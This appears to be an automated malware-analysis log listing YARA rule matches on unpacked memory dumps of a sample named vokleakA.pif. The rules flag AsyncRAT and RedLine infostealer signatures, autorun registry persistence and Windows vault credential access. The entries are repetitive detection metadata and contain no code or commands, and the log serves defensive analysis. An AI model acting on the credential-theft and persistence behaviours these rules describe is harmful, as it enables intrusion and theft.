Source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
